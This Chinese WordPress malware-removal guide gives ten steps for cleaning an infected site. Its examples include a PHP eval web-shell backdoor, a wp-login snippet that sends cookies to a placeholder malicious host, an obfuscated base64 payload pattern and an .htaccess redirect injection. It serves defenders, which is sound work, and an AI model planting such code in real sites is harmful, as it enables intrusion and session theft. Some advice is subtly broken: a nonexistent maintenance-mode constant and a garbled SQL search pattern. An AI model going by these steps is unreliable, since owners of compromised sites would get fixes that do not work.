WordPress恶意代码清除

1. 先别慌，把站搞成维护模式。wp-config.php里加这个：

define('WP_maintenance_MODE', true);

访问者会看到默认提示，免得乱码吓到人。FTP或文件管理里找这个文件，塞代码到<?php下面就行。

2. 扫垃圾文件——核心思路是“最近改了啥”。wp-content/uploads里正常，但plugins或themes里突然多出.php文件？比如：

// 可疑文件：/wp-content/themes/twentythirteen/okay.php
<?php
eval($_POST['backdoor']); // 这种直接删
?>

用命令找24小时内新增文件（服务器上跑）：

find /path/to/wordpress -name "*.php" -mtime -1

3. 数据库清洗。进phpMyAdmin，搜wp_posts表（表前缀可能是别的），找post_content里带eval、base64_decode的：

SELECT * FROM wp_posts WHERE post_content LIKE '%eval(%base64_decode(%<%php%//javascript%';

看到内容像<?php eval(gzinflate(base64_decode('xxx'))) ?>这种，整条记录删除。别忘备份表！

4. 检查核心文件。wp-admin和wp-includes里的文件别乱改，但可重新上传官方包覆盖。重点看wp-login.php——有没有多出奇怪重定向代码：

// 正常登录逻辑后突然插一段：
if (isset($_GET['redirect_to'])) {
    header('Location: http://恶意.site/?steal_cookie=' . $_COOKIE);
}

5. 改密钥防会话劫持。wp-config.php里找八个密钥，用官方生成器换新：https://api.wordpress.org/secret-key/1.1/salt/ 替换后全体用户需重新登录。

6. 权限收紧：文件夹755，文件644。wp-config.php设为440或600：

chmod 600 wp-config.php

7. 事后装安全插件：Wordfence或Sucuri。扫残留后门，设防火墙规则。免费版够用，但记得调扫描频率——别让服务器累趴。

8. 最后：检查.htaccess有没有注入跳转规则。有时恶意代码会塞这段：

RewriteEngine On
RewriteCond %{HTTP_REFERER} *google.com* [NC]
RewriteRule ^(.*)$ http://仿冒网.com/?hack=yes [R=301,L]

删掉异常规则，保留WordPress自带部分。

9. 用户习惯：别用admin当用户名，密码别设123456。插件从官方库下，nulled版百分百带毒。定期更新，站小也要当回事。

10. 如果还不行？备份数据，重装整个WordPress。干净系统加安全配置，比没完没了查马省时间。记住：站越复杂，漏洞面越大。

——完，但安全没完。保持警惕。

Tags：

文章版权声明：除非注明，否则均为WP集市原创文章，转载或复制请以超链接形式并注明出处。